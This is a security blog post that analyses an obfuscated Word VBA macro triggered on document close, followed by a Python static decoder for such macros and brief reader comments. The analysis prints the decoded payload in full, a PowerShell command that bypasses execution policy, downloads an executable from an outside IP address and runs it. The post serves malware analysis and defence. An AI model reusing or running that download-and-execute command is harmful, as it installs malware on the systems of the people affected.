I recently blogged about attackers using the auto-close method in Microsoft Word VBA for attacks.
Today I pasted a sample of a malicious Microsoft Word document. If you review the VBA code you'll see that it's a bunch of random variable names, a bunch of calls to ChrW, and one call to Shell.
ChrW returns the character associated with the numeric character code.
Shell runs the command line code that is passed to it.
How does it work? It creates a method called 'sdfsdfdsf' that is called when the Microsoft Word document gets closed.
Then it declares 6 variables (GVhkjbjv + GYUUYIiii + hgFYyhhshu + GYiuudsuds + shdfihiof + doifhsoip) and in each variable it appends, one character at a time, the malicious shell command it wants to run.
As an example, the first 4 characters in GVhkjbjv are 'c', 'm', 'd', and a space.
ChrW(49.5 + 49.5) & ChrW(54.5 + 54.5) & ChrW(50 + 50) & ChrW(16 + 16)
How did I know that?
ChrW(49.5 + 49.5) = ChrW(99) = 99 on the ASCII table is the letter 'c'
ChrW(54.5 + 54.5) = ChrW(109) = 109 on the ASCII table is the letter 'm'
ChrW(50 + 50) = ChrW(100) = 100 on the ASCII table is the letter 'd'
ChrW(16 + 16) = ChrW(32) = 32 on the ASCII table is the space character ' '
So if you follow that process through to the end you find
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.203/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;
If you're lazy (like me) and don't want to figure that out 1 character at a time, there are probably tools to fix that.
Or just open a new Word document, copy this code in, but replace the malicious Shell line
IUGuyguisdf = Shell(JHGUgisdc, 0)
with a message box
MsgBox(JHGUgisdc)
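For analysts who would rather not open the document at all (even with Shell swapped for MsgBox), here is a small static decoder. This is an added example written for this post, not the author's code and not a tool the post refers to; it is a self-contained Python script that walks the macro text line by line, evaluates each ChrW(...) call with a restricted arithmetic evaluator (no eval()), rebuilds every string variable across repeated appends, and reports the argument of the final Shell() call. It goes a little beyond the sample above: it also handles Chr() as well as ChrW(), quoted string literals (including VBA's "" quote escape), and concatenation with either & or +. The SAMPLE_VBA macro embedded below is constructed for the demonstration, keeps the shape of the macro the post describes (auto-close entry point, throwaway variable names, one character per ChrW call, one Shell call), and decodes to a harmless command.

```python
import ast
import operator
import re

# Constructed sample modelled on the shape of the macro described in the post:
# auto-close entry point, throwaway variable names, one character per ChrW()
# call, and a final Shell() call. The decoded command here is harmless.
SAMPLE_VBA = """
Private Sub Document_Close()
    sdfsdfdsf
End Sub

Sub sdfsdfdsf()
    Dim GVhkjbjv As String
    Dim GYUUYIiii As String
    GVhkjbjv = ChrW(49.5 + 49.5) & ChrW(54.5 + 54.5) & ChrW(50 + 50) & ChrW(16 + 16)
    GVhkjbjv = GVhkjbjv & ChrW(47) & ChrW(75)
    GYUUYIiii = ChrW(32) & "ec" & Chr(104) & Chr(111) & ChrW(16 + 16)
    GYUUYIiii = GYUUYIiii & ChrW(50 + 50) & ChrW(55.5 + 55.5) & Chr(110) & Chr(101)
    JHGUgisdc = GVhkjbjv + GYUUYIiii
    IUGuyguisdf = Shell(JHGUgisdc, 0)
End Sub
"""

# Only these operators are allowed inside a Chr/ChrW argument.
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
        ast.Mult: operator.mul, ast.Div: operator.truediv}


def _eval_arith(expr):
    """Evaluate a numeric expression such as '49.5 + 49.5' without eval().
    Only numeric literals, unary minus and + - * / are accepted; anything
    else (names, calls, other operators) raises ValueError."""
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -walk(node.operand)
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError("unsupported expression: %r" % expr)
    try:
        tree = ast.parse(expr.strip(), mode="eval")
    except SyntaxError:
        raise ValueError("unparseable expression: %r" % expr)
    return walk(tree)


# One token of a VBA string expression: literal, Chr/ChrW call, name, operator.
_TOKEN = re.compile(
    r'"(?P<lit>(?:[^"]|"")*)"'            # string literal; "" escapes a quote
    r'|(?P<chr>ChrW?)\s*\((?P<arg>[^()]*)\)'  # Chr(...) / ChrW(...) with arithmetic
    r'|(?P<name>\w+)'                     # a previously assigned variable
    r'|(?P<op>[&+])'                      # concatenation
    r'|(?P<ws>\s+)'
    r'|(?P<bad>.)', re.IGNORECASE)
_ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$")
_SHELL = re.compile(r"\bShell\s*\(\s*(\w+)", re.IGNORECASE)


def eval_concat(rhs, env):
    """Evaluate the right-hand side of a VBA string assignment using the
    variables already decoded in env. Returns None when the expression
    contains something this decoder does not understand (unknown variable,
    function call other than Chr/ChrW, stray punctuation)."""
    out = []
    for m in _TOKEN.finditer(rhs):
        if m.group("lit") is not None:
            out.append(m.group("lit").replace('""', '"'))
        elif m.group("chr") is not None:
            # VBA coerces 99.0 to the Long 99; CLng rounds half to even,
            # which is also what Python's round() does.
            out.append(chr(round(_eval_arith(m.group("arg")))))
        elif m.group("name") is not None:
            if m.group("name") not in env:
                return None
            out.append(env[m.group("name")])
        elif m.group("bad") is not None:
            return None
    return "".join(out)


def decode_macro(vba_source):
    """Rebuild every string variable in the macro and return
    (variables, shell_command); shell_command is None if no Shell() call
    whose argument is a decoded variable was found."""
    env = {}
    shell_cmd = None
    for line in vba_source.splitlines():
        shell = _SHELL.search(line)
        if shell:
            shell_cmd = env.get(shell.group(1))
            continue
        m = _ASSIGN.match(line)
        if not m:
            continue  # Dim, Sub, End Sub, bare procedure calls, etc.
        value = eval_concat(m.group(2), env)
        if value is not None:
            env[m.group(1)] = value
    return env, shell_cmd


if __name__ == "__main__":
    variables, command = decode_macro(SAMPLE_VBA)
    for name, value in variables.items():
        print("%-12s = %r" % (name, value))
    print("Shell() argument:", command)
```

Feed decode_macro the macro text extracted from the document (for example the output of olevba from oletools) and read the Shell() argument without ever letting the macro execute; for the sample above it prints `cmd /K echo done`. Assignments the decoder cannot evaluate are skipped rather than guessed, so a missing variable in the output is the signal to go back and decode that line by hand, as the post does.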
Happy hunting.
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
This is good for Digital Forensic Analysts. Nice piece.
Glad I could help!
This is my first time I visit here and I found so much interesting stuff in your blog, especially its discussion, thank you.